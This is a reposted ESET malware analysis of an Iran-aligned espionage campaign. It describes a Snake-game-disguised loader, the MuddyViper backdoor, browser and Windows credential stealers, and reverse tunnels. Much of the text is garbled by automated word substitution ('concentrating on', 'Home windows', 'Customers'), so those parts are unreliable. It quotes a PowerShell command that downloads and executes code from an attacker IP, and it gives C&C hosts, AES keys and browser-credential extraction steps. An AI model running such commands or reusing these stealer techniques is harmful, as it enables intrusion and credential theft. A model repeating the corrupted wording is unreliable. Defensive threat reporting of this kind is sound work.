MuddyWater: Snakes by the riverbank

ESET researchers have recognized new MuddyWater exercise primarily concentrating on organizations in Israel, with one confirmed goal in Egypt. MuddyWater, additionally known as Mango Sandstorm or TA450, is an Iran-aligned cyberespionage group recognized for its persistent concentrating on of presidency and demanding infrastructure sectors, usually leveraging {custom} malware and publicly obtainable instruments. On this marketing campaign, the attackers deployed a set of beforehand undocumented, {custom} instruments with the target of bettering protection evasion and persistence. Amongst these instruments is a {custom} Fooder loader designed to execute MuddyViper, a C/C++ backdoor. A number of variations of Fooder masquerade because the basic Snake sport, and its inner logic features a {custom} delay perform impressed by the sport’s mechanics, mixed with frequent use of Sleep API calls. These options are meant to delay execution and hinder automated evaluation. MuddyViper permits the attackers to gather system info, execute information and shell instructions, switch information, and exfiltrate Home windows login credentials and browser knowledge. The marketing campaign additionally leverages credential stealers (CE‑Notes and LP‑Notes) and reverse tunneling instruments (go‑socks5), lengthy a favourite of MuddyWater operators.

Though that is our first public blogpost overlaying MuddyWater, ESET researchers have been monitoring the group for a number of years and have documented its actions in a number of ESET APT Exercise Studies. Not like earlier campaigns of MuddyWater, which had been usually noisy and simply detected, the one coated on this blogpost demonstrates a extra targeted, refined, and refined strategy.

Key factors of this blogpost:

• MuddyWater builders adopted CNG, the next-generation Home windows cryptographic API, which is exclusive for Iran-aligned teams and considerably atypical throughout the broader risk panorama.
• The group additionally used extra superior methods to deploy MuddyViper, a brand new backdoor, through the use of a loader (Fooder) that reflectively hundreds it into reminiscence and executes it.
• We offer technical analyses of the instruments used on this marketing campaign, together with MuddyViper, the Fooder loader, the CE-Notes browser-data stealer, the LP-Notes credential stealer, the Blub browser-data stealer, and go‑socks5 reverse tunnels.
• Throughout this marketing campaign, the operators intentionally averted hands-on-keyboard interactive classes, which is a traditionally noisy method usually characterised by mistyped instructions.

MuddyWater group overview

MuddyWater is a cyberespionage group energetic since at the least 2017, primarily concentrating on entities within the Center East and North America. It is among the most energetic Iran-aligned APT teams tracked by ESET researchers and has hyperlinks to the Ministry of Intelligence and Nationwide Safety of Iran.

The group was first launched to the general public as MuddyWater by Unit 42 in 2017, whose description of the group’s exercise is in line with ESET’s profiling – a give attention to cyberespionage, using malicious paperwork as attachments designed to immediate customers to allow macros and bypass safety controls, and a main concentrating on of entities situated within the Center East.

Notable previous actions embody Operation Quicksand (2020), a cyberespionage marketing campaign concentrating on Israeli authorities entities and telecommunications organizations, which exemplifies the group’s evolution from fundamental phishing techniques to extra superior, multistage operations; and a marketing campaign concentrating on political teams and organizations in Türkiye, demonstrating the group’s geopolitical focus, its capability to adapt social engineering techniques to native contexts, and reliance on modular malware and versatile C&C infrastructure.

Moreover its frequent exercise, MuddyWater operations are sometimes noisy. The group is thought for its persistent concentrating on of presidency, navy, telecommunications, and demanding infrastructure sectors, sometimes utilizing {custom} malware and publicly obtainable instruments to achieve entry, preserve persistence, and exfiltrate delicate knowledge. Along with concentrating on its archenemy, Israel, the group seems to be concentrating on nations that preserve, or search to strengthen, diplomatic ties with Iran.

ESET has documented a number of campaigns attributed to MuddyWater that spotlight the group’s evolving toolset and shifting operational focus. Whereas the sooner operations relied on broad concentrating on and comparatively unsophisticated methods, more moderen campaigns show indicators of technical refinement and elevated precision.

In March and April 2023, MuddyWater focused an unidentified sufferer in Saudi Arabia by deploying a batch script that downloaded a PowerShell-based backdoor, which was used to obtain and execute arbitrary payloads and subsequently to take away the preliminary payload from disk.

The group performed a marketing campaign in January and February 2025 that was notable for its operational overlap with Lyceum (an OilRig subgroup), additional detailed on this publication. This newest overlap suggests an evolution in MuddyWater’s modus operandi.

The group’s publicly documented {custom} instruments embody, for instance, the Bugsleep, Blackout, Small Sieve, Mori, and POWERSTATS backdoors, in addition to custom-compiled variants of open-source instruments akin to LaZagne or CrackMapExec. MuddyWater campaigns sometimes don’t leverage or introduce new instruments, malware, or methods; as a substitute, they’re usually noteworthy as a result of concentrating on.

Whereas MuddyWater initially concentrated strictly on cyberespionage, its cooperation with Lyceum led to concentrating on of the manufacturing sector by way of spearphishing. The assault generated appreciable noise and achieved little when it comes to operational aims.

The marketing campaign outlined on this publication reveals what, for MuddyWater, appears to be an unprecedented development in toolset and technical execution.

Victimology

As beforehand talked about, throughout this marketing campaign, MuddyWater primarily focused organizations in Israel, but in addition one in Egypt. Desk 1 lists the victims by nation and vertical. The marketing campaign started on September 30^th, 2024 and concluded on March 18^th, 2025.

Desk 1. Victims by nation and vertical

In early 2025, ESET Analysis recognized an operational overlap between MuddyWater and Lyceum, a subgroup of the Iran-aligned OilRig cyberespionage group, also referred to as HEXANE or Storm-0133. OilRig has been energetic since at the least 2014 and is generally believed to be primarily based in Iran. Instruments that we attribute to Lyceum embody DanBot, Shark, Milan, Marlin, Photo voltaic, Mango, OilForceGTX, and quite a lot of downloaders that leverage respectable cloud companies for C&C communication. We now have beforehand noticed Lyceum concentrating on a number of Israeli organizations, together with nationwide and native governmental entities, in addition to organizations within the healthcare sector.

Throughout the marketing campaign coated right here, MuddyWater performed a joint sub-campaign with OilRig in January and February 2025, MuddyWater initiated entry by way of a spearphishing e-mail containing a hyperlink to an installer for the Syncro distant monitoring and administration (RMM) software program. Following the preliminary compromise, the attackers put in an extra RMM software, PDQ, and deployed a {custom} Mimikatz loader disguised as certificates information with .txt file extensions. Based mostly on the noticed exercise, harvested credentials had been most likely utilized by Lyceum to achieve entry and assume management of operations throughout the focused manufacturing-sector group in Israel.

This cooperation means that MuddyWater could also be performing as an preliminary entry dealer for different Iran-aligned teams.

Attribution

The victimology, TTPs, and tooling noticed on this marketing campaign align with a number of of the newly documented capabilities and instruments that we have now beforehand attributed to MuddyWater. This evaluation relies on the preliminary entry methodology and the next supply of malicious instruments – typically through spearphishing emails that include hyperlinks to obtain RMM software program.

TTPs

MuddyWater operators proceed to depend on predictable and script-based backdoors written in PowerShell and Go. Their concentrating on stays targeted on the telecommunications, governmental, and oil and vitality sectors.

Preliminary entry is usually achieved by way of spearphishing emails, usually containing PDF attachments that hyperlink to installers for RMM software program hosted on free file-sharing platforms akin to OneHub, Egnyte, or Mega. These hyperlinks result in the obtain of RMM instruments together with Atera, Degree, PDQ, and SimpleHelp.

Among the many instruments deployed by MuddyWater operators can also be the VAX‑One backdoor, named after the respectable software program which it impersonates: Veeam, AnyDesk, Xerox, and the OneDrive updater service.

The group’s continued reliance on this acquainted playbook makes its exercise comparatively simple to detect and block.

Instruments overlap

Moreover, we recognized code overlaps between a number of of the newly documented instruments and people we beforehand attributed to MuddyWater:

• LP-Notes, a brand new credential stealer, has the identical design as CE-Notes, a browser-data stealer, that we beforehand related to MuddyWater. Throughout this marketing campaign, we additionally noticed a Mimikatz loader, which shares the identical design and obfuscation strategies as CE-Notes.
• We noticed a number of new variants of MuddyWater’s personalized go‑socks5 reverse tunnels, which the group used all through 2024 and 2025.
• In two cases, we noticed the personalized go‑socks5 reverse tunnels embedded in a brand new MuddyWater loader, internally named Fooder. In a dozen different instances, this loader was used to load MuddyWater’s new backdoor, MuddyViper.
• Apparently, MuddyViper and the CE-Notes/LP-Notes/Mimikatz loader variants use the CNG API for knowledge encryption and decryption. To one of the best of our information, that is distinctive to Iran-aligned teams. One other trait these instruments share is that they try and steal consumer credentials by opening a faux Home windows Safety dialog.

Toolset

On this blogpost, we doc beforehand unknown, {custom} instruments utilized by MuddyWater:

• Fooder loader – a newly recognized loader that hundreds the MuddyViper backdoor into reminiscence and executes it. Notice that a number of variations of Fooder masquerade because the basic Snake sport, therefore the designation, MuddyViper. One other notable attribute of Fooder is its frequent use of a {custom} delay perform that implements the core logic of the Snake sport, mixed with Sleep API calls. These options are meant to delay execution in an try to cover malicious habits from automated evaluation techniques.
• MuddyViper backdoor – a beforehand undocumented C/C++ backdoor that allows attackers to gather system info, obtain and add information, execute information and shell instructions, and steal Home windows credentials and browser knowledge.

The remainder of the toolset documented on this blogpost contains:

• CE-Notes, a browser-data stealer,
• LP-Notes, a credential stealer,
• Blub, a browser-data stealer, and
• a number of go‑socks5 reverse tunnels.

Fooder loader

Fooder is a 64-bit C/C++ loader designed to decrypt after which reflectively load the embedded payload (as illustrated in Determine 1), with MuddyViper being probably the most steadily noticed payload.

Fooder appears to be the inner identify of this software, primarily based on its PDB paths:

• C:UserswinDesktopFooderDebugLauncher.pdb
• C:UserspcDesktopmainMy_ProjectFooderx64DebugLauncher.pdb

Though we have now solely captured one pattern of it, we imagine that Fooder is executed by a easy launcher utility, written in C. It has no string obfuscation and verbose logging to the console, and the PDB path left intact:

C:UserspcsourcereposConsoleApplication7x64ReleaseConsoleApplication7.pdb

We now have noticed one occasion (SHA-1: 76632910CF67697BF5D7285FAE38BFCF438EC082) of the element launching Fooder. Deployed underneath the identify %USERPROFILEpercentDownloadsOsUpdater.exe, the launcher expects a course of ID as a command line argument. As soon as executed, it makes an attempt to duplicate the token of the required course of through the DuplicateTokenEx API, after which makes use of CreateProcessAsUserA to execute Fooder.

As soon as executed, Fooder decrypts the embedded payload following these steps:

• The command line argument (6) is added to every byte of a hardcoded key, which produces the AES decryption key, shared throughout all samples, 6969697820511281801712341067111416133321394945138510872296106446.
• A hardcoded worth (5) is subtracted from every byte of the hardcoded payload.
• Lastly, the hardcoded payload is decrypted utilizing the WinCrypt API and the AES key.

Fooder then hundreds the payload straight into reminiscence utilizing reflective methods, permitting it to execute with out counting on normal system calls or writing to disk.

As soon as launched thus, Fooder has been used to ship not solely MuddyViper but in addition HackBrowserData, an open-source utility able to decrypting and exporting delicate browser info akin to credentials and cookies. Fooder additionally facilitates the deployment of go‑socks5 variants, that are Go-compiled binaries that perform as reverse tunnels, enabling attackers to bypass firewalls and Community Tackle Translation (NAT) mechanisms. Notably, the MuddyWater group has beforehand utilized go‑socks5 independently of Fooder, indicating a continued reliance on this software for stealthy community communication and knowledge exfiltration.

Notice that a number of variations of Fooder masquerade because the Snake sport – see the strings and mutexes highlighted in Determine 2 – its most steadily embedded payload.

One other notable attribute of Fooder is its frequent use of a {custom} delay perform (which implements the core logic of the Snake sport, the place the participant maneuvers the top of a rising line, usually themed as a snake, to keep away from obstacles and gather objects) and the Sleep API calls. The delay in execution is achieved by mimicking the loop-based delay perform: as within the Snake sport, the place every motion is managed by a loop that waits for a brief interval earlier than updating the sport. The loop introduces execution delays that decelerate the malware’s habits, serving to it to evade instruments that monitor for speedy malicious exercise. Determine 3 highlights the delays and the Snake sport welcome banner offered to the consumer at runtime.

Fooder doesn’t have any built-in persistence functionality. Nonetheless, in instances when Fooder’s remaining payload is the MuddyViper backdoor, the backdoor can arrange persistence for the loader through a scheduled activity or the Startup folder.

MuddyViper backdoor

MuddyViper, a beforehand undocumented backdoor written in C and C++, permits gaining covert entry and management over compromised techniques. We now have noticed MuddyViper solely in reminiscence, loaded by Fooder, which may be the explanation there isn’t a obfuscation or string encryption. As is typical for MuddyWater, MuddyViper sends extraordinarily verbose and frequent standing messages to its C&C server all through its execution, akin to the next:

• [+] Persist: ——————– Hello,I’m Stay ——————–
• [+] Persist: ——————– Hello,First Time ——————–
• [-] Persist: failed Create activity !!!!

The backdoor additionally retains a prolonged listing of 150+ course of names and particulars concerning the respective merchandise to have the ability to ship detailed experiences concerning the safety instruments detected within the compromised setting, despite the fact that including the main points might have been simply carried out on the server facet:

• [>] Course of: aciseagent.exe ~~> (Cisco Umbrella Roaming Safety) –> (Safety DNS) discovered!
• [>] Course of: acnamagent.exe ~~> (Absolute Persistence) –> (Asset Administration) discovered!
• [>] Course of: acnamlogonagent.exe ~~> (Absolute Persistence) –> (Asset Administration) discovered!

This habits ends in substantial community site visitors.

MuddyViper has two strategies of creating persistence:

• A scheduled activity named ManageOnDriveUpdater can launch MuddyViper from the trail on every system begin.

MuddyViper helps 20 backdoor instructions – see Desk 2 for particulars of all of them – notably together with the flexibility to open and function reverse shells, obtain, add, and execute information, report the operating safety instruments, steal consumer credentials and knowledge from quite a lot of browsers, arrange its personal persistence, and uninstalling itself.

Desk 2. MuddyViper backdoor instructions

One of many instructions listed in Desk 2, with ID 805, shows a faux Home windows Safety dialog in an try and entice the sufferer into filling of their Home windows credentials, as seen in Determine 4. An analogous method is utilized by MuddyWater’s LP-Notes stealer (see LP-Notes credential stealer).

One other command, with ID 900, goals to take away MuddyViper from the compromised machine and clear its persistence; nevertheless, the command doesn’t take away all traces of the backdoor.

Community protocol

To speak with its C&C server, MuddyViper makes use of HTTP GET requests (through the WinHTTP API) over port 443, with the WINHTTP_FLAG_SECURE flag configured to make use of SSL/TLS. Two C&C servers have been noticed: processplanet[.]org and 35.175.224[.]64.

Each instructions of communication AES-CBC encrypt the info, utilizing the CNG API with the important thing (used throughout samples) 0608101047106453101617106423101013101012101083109710108585106969 and the IV 0.

Within the backdoor → server route of the communications:

• Every endpoint URI supported by the C&C server can be utilized by the backdoor for a selected kind of request, akin to requesting a command, importing a file, or sending a {custom} standing message.
• Extra knowledge for the C&C server is included within the HTTP request physique, which is unconventional for HTTP GET requests.
• The Person-Agent string is A WinHTTP Instance Program/1.0, a remnant of the instance code for the WinHttpOpen API.
• The connection, ship, obtain, and response timeouts are set to 30 seconds.
• Default sleep time between consecutive connection makes an attempt is 60 seconds. This worth might be configured by command ID 700.
• Upon failure, connection makes an attempt are retried as much as 10 occasions.
• Previous to encryption, the info is all the time formatted as /*.

Within the server → backdoor route of the communications:

• The HTTP standing code determines the backdoor command ID.
• The backdoor command arguments are included within the HTTP response physique.

CE-Notes browser-data stealer

CE-Notes is a browser-data stealer that we named after the filename – ce-notes.txt – used to stage stolen knowledge on disk. We found CE-Notes in 2024 once we noticed MuddyWater deploying EXE and DLL variations of it on the system of a company in Israel.

CE-Notes was downloaded with the next PowerShell command:

“C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe” (Invoke-WebRequest -UseDefaultCredentials -UseBasicParsing -Uri http://206.71.149[.]51:443/57576?filter_relational_operator_2=60169).content material | Invoke-Expression

Each variations of the browser-data stealer try and steal and decrypt the app-bound encryption key saved within the Native State file (%APPDATApercentLocalGoogleChromeUser DataLocal State) of Chromium browsers (Chrome, Courageous, and Edge). App-bound encryption was launched in Chrome model 127, enabling Chrome to encrypt knowledge tied to app id. Cybercriminals and APT teams have caught on and are actively making an attempt to work round app-bound encryption to steal session keys. CE-Notes is kind of just like ChromElevator on GitHub.

The collected knowledge is AES-CBC encrypted utilizing the CNG API with the important thing 9262A37DF166AC1D5F582AAC79F54CCB47623BFD9BA001228D284AE13A08F52F and the IV 4103A09887B82FFD56A93BB431805224.

Then the encrypted knowledge is saved on disk in C:UsersPublicDownloadsce-notes.txt for later retrieval (most likely through an RMM software, since neither the EXE nor the DLL variations have any technique of exfiltrating the file). The first distinction between the EXE and the DLL is the digital machine evasion performance added to the DLL.

We noticed the CE-Notes browser-data stealer within the following places:

• C:system2.dll
• C:UsersPublicDownloadssystem2.dll
• C:Intelsystem.dll
• C:20240926_165509.exe

LP-Notes credential stealer

LP-Notes is a C/C++ Home windows credential stealer with the identical design because the CE-Notes browser-data stealer. Following the identical naming conference as within the case of CE-Notes, we named the stealer LP-Notes primarily based on the native file it makes use of to stage stolen credentials earlier than exfiltration: C:UsersPublicDownloadslp-notes.txt (vs. C:UsersPublicDownloadsce-notes.txt). The only goal of LP-Notes is to entice victims into submitting their credentials by displaying a faux Home windows Safety dialog, prompting them to enter their Home windows username and password. We now have noticed an occasion of LP-Notes being downloaded and executed by PowerShell with a really related command line to that proven within the CE-Notes part.

Initialization

On execution, LP-Notes begins by looking for a course of named taskhostw.exe (Host Course of for Home windows Duties) after which impersonating the safety context of the method (through the ImpersonateLoggedOnUser API); solely then does LP-Notes activate its malicious payload.

LP-Notes employs a number of easy obfuscation methods, together with a {custom}, addition-based routine for string decryption. Determine 5 reveals the perform that decrypts strings of lengths starting from 15 to 19 characters, although the decryption secret is all the time the identical – a set of predefined constants which might be added or subtracted from every byte of the string. Apparently, CE-Notes makes use of the identical decryption routine, apart from a special decryption key, as proven in Determine 6.

LP-Notes makes use of string stacking for strings shorter than 15 or longer than 19 characters, together with the decryption key, IV, and import names. Lastly, to obscure using Home windows API features and to make static evaluation tougher, LP-Notes dynamically resolves the API features through the C runtime startup, earlier than the execution of the WinMain perform, the usual entry level for a graphical Home windows-based utility per Microsoft, thus hiding direct references to the API features from pseudocode view (see Determine 7).

Capabilities

In an limitless loop, LP-Notes shows a faux Home windows Safety dialog prompting the sufferer to enter their Home windows username and password, as proven in Determine 8 (through the CredUIPromptForWindowsCredentialsW API). Notice that though related, this isn’t the identical because the faux credential immediate utilized by MuddyViper (see Determine 4). It instantly confirms the validity of any submitted credentials by making an attempt to go online as that consumer (through the CredUnPackAuthenticationBufferW and LogonUserW APIs).

If profitable, the harvested credentials are then AES-CBC encrypted utilizing the CNG API with the important thing ED15C8344B45DAED1E0578F8BC1A32411812C61F4CB45D89B107287DE0E09FFC and the IV 91A4E6F6D51DAEE773A8F00279792578.

Just like CE-Notes, LP-Notes then shops the encrypted credentials in a neighborhood file – on this case C:UsersPublicDownloadslp-notes.txt. As neither of those elements have the aptitude to exfiltrate knowledge, one other element presumably handles this (both an RMM software or MuddyViper).

Blub browser-data stealer

Blub is a C/C++ browser-data stealer incorporating a statically linked SQLite library. The identify is derived from its filename, Blub.exe. We noticed the PDB path C:Usersjojosourcereposstealerx64Releasestealer.pdb. It steals consumer login knowledge from Google Chrome, Microsoft Edge, Mozilla Firefox, and Opera net browsers.

Chromium-based browsers

For Chrome, Blub first terminates chrome.exe (if operating) after which parses and decrypts the encryption key from C:CustomersAppDataLocalGoogleChromeUser DataLocal State. This secret is used to encrypt delicate knowledge saved by Chrome, akin to passwords or cookies, and it’s protected by the Knowledge Safety API (DPAPI) in order that it may solely be decrypted on the system the place it was initially encrypted. Blub decrypts this key through the CryptUnprotectData API, after which makes use of it to decrypt consumer credentials obtained from all current Chrome consumer profiles on the compromised pc. The credentials, saved in C:CustomersAppDataLocalGoogleChromeUser KnowledgeLogin Knowledge, are obtained through the next SQL question:

SELECT origin_url, username_value, password_value FROM logins

An analogous sequence of steps is used to acquire and decrypt consumer credentials from Microsoft Edge and Opera consumer profiles, utilizing the important thing obtained from C:CustomersAppDataLocalMicrosoftEdgeUser DataLocal State and C:CustomersAppDataRoamingOpera SoftwareOpera StableLocal State, respectively.

Firefox

Lastly, to decrypt saved consumer credentials for Mozilla Firefox, Blub parses the hostname, encryptedUsername, and encryptedPassword values from the logins.json file in every consumer’s profile listing, i.e., %APPDATAROAMINGpercentMozillaFirefoxProfiles. The credentials are then decrypted utilizing the PK11SDR_Decrypt perform from the nss3.dll library utilized by Firefox.

The collected knowledge is saved into a neighborhood file named file.txt, with no encryption. The identical knowledge is logged onto the console, with no encryption, together with verbose standing messages. Blub has no functionality to exfiltrate this file.

Notice that Blub checks for operating processes related to safety options earlier than executing its malicious payload, specializing in the mix of afwServ.exe (Avast firewall) and AvastSvc.exe (Avast antivirus) processes. If afwServ.exe is detected operating (however not AvastSvc.exe), Blub concludes that Norton is operating (which now makes use of the Avast engine) on the compromised host, and exits. If AvastSvc.exe (Avast) is detected, Blub continues with the execution, besides it skips stealing credentials from Microsoft Edge.

Whereas Blub’s strings are saved in cleartext, a easy obfuscation method is used for strings related to the Google Chrome knowledge stealer performance. Particularly, a number of strings are concatenated into one lengthy string, with 16 random characters between them, apparently to cover them from view throughout static evaluation:

gdGlog}o{eRwjpw&”encrypted_key”:FAe[b-vcJvxGImpersonateLoggehgdOvlgt_NxuoolOpenProcessTokenVLUKKW’xxqjpwe}uDuplicateTokenExs5&}vleIpuvvkdXznx(Ghn2(sh|y⌂ryme~ds~

Removing the junk characters and splitting the strings returns:

• “encrypted_key”:
• ImpersonateLogge
• OpenProcessToken
• DuplicateTokenEx

go‑socks5 reverse tunnels

MuddyWater’s go‑socks5 reverse tunnels are a collection of Go-compiled tools, based on publicly available libraries such as go‑socks5, yamux, and resocks; they have been frequently used in MuddyWater’s recent campaigns.

Most of the variants we analyzed appear to be internally named ESETGO (no relation to ESET), based on the build configuration strings shown in Figure 9 and in other artifacts.

path  ESETGO
mod   ESETGO	(devel)
dep   github.com/armon/go-socks5	v0.0.0-20160902184237-e75332964ef5h1:0CwZNZbxp69SHPdPJAN/hZIm0C4OItdklCFmMRWYpio=
dep	  github.com/hashicorp/yamux	v0.1.1	h1:yrQxtgseBDrq9Y652vSRDvsKCJKOUD+GzTS4Y0Y8pvE=
dep	  golang.org/x/net	v0.29.0	h1:5ORfpBpCs4HzDYoodCDBbwHzdR5UrLBZ3sOnUJmFoHo=
dep	  golang.org/x/sys	v0.25.0	h1:r+8e+loiHxRqhXVl6ML1nO3l1+oFoWbnlu2Ehimmi34=
build -buildmode=exe
build -compiler=gc
build -ldflags="-w -s"
build CGO_ENABLED=1
build CGO_CFLAGS=
build CGO_CPPFLAGS=
build CGO_CXXFLAGS=
build CGO_LDFLAGS=
build GOARCH=amd64
build GOOS=windows
build GOAMD64=v1

Figure 9. Build configuration strings from MuddyWater’s go‑socks5 variants

For any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com. 

ESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the ESET Threat Intelligence page.

IoCs

Files

Network

MITRE ATT&CK methods

This desk was constructed utilizing model 17 of the MITRE ATT&CK framework.